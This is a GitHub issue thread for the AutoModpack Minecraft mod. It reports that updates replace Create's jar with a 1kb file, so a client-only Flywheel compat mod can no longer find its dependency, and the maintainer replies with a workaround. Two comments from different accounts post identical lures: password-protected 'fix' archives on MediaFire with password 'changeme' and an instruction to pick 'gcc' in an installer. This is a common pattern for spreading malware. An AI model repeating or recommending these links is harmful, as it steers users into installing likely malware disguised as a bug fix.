### ISSUE TITLE
Destroy the module dependency relationship

### ISSUE THREAD

**Issue by SanQianQVQ** [Skidamek/AutoModpack#276]
### Bug description

follow https://github.com/Skidamek/AutoModpack/issues/275

When AutomodPack does this, my game will directly collapse
I investigated further, I found that when multiple MOD linkage involved in Fabric 1.20.1, it would strangely destroy the jar in jar dependency of MOD. As a result, the game crashes directly

- Since Create V0.5.0E-1.19.2, Create has contain Flywheel mod no longer requires additional installation of front mod
- Iris & Oculus Flywheel Compat allows Flywheel and Iris to work together. It requires Iris and Flywheel as the front mod
- Update through AutomodPack, because Create is a mod that both server and client need to be installed, Create is replaced by 1kb 
- Iris & Oculus Flywheel Compat is a client MOD, which is not included in my server's /automodpack/host-modpack/main/mods/
- This has led to Iris & Oculus Flywheel Compat believes that the Flywheel Mod is missing and cannot start the game normally

This looks like a logical problem, because sometimes players will add MOD by themselves and cause this strange problem
Because since Create V0.5.0E-1.19.2, Create has begun built-in Flywheel Mod no longer requires additional installation front.
So Iris & Oculus Flywheel Compat should not install Flywheel, because it built-in create.

### Steps to reproduce

1. install create 0.5.1f on server and install iris, Iris & Oculus Flywheel Compat on Client
2. connect server
3. download files
4. restart game
5. gui say "restart"
6. files 1kb
7. game crash
8. Iris & Oculus Flywheel Compat say lacks the front "Flywheel"

### Expected behavior

The game is running normally

### Minecraft & Mod Loader versions

1.20.1 Fabric 0.15.x

### Minecraft launcher

Plain Craft Launcher II

### Operating system

Windows11

### AutoModpack version

Beta16

### Other information

create 0.5.1f-build.1417
Iris & Oculus Flywheel Compat 1.1.2
iris shaders 1.7.2

### Check list

- [X] I have verified that the issue persists in the latest version of the mod.
- [X] I have searched the existing issues and confirmed that this is not a duplicate.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Skidamek** [comment]
yes, you need flywheel inside default mods folder as well. (e.g. extracted from create) 
#223 will fix that, then you will be able to provide mods like `Iris & Oculus Flywheel Compat 1.1.2` in separate optional modpack module, which then loaded by automodpack, wont crash.
Other than that someone could implement better algorithm which could search though the modpack mods and find mod like create which provides the flywheel. As of right now, i dont have much time to do that.
[Current implementation](https://github.com/Skidamek/AutoModpack/blob/9b78bcdba4bddea3c6fd8801c4169515dba73879/loader/core/src/main/java/pl/skidam/automodpack_loader_core/client/ModpackUtils.java#L137-L232)
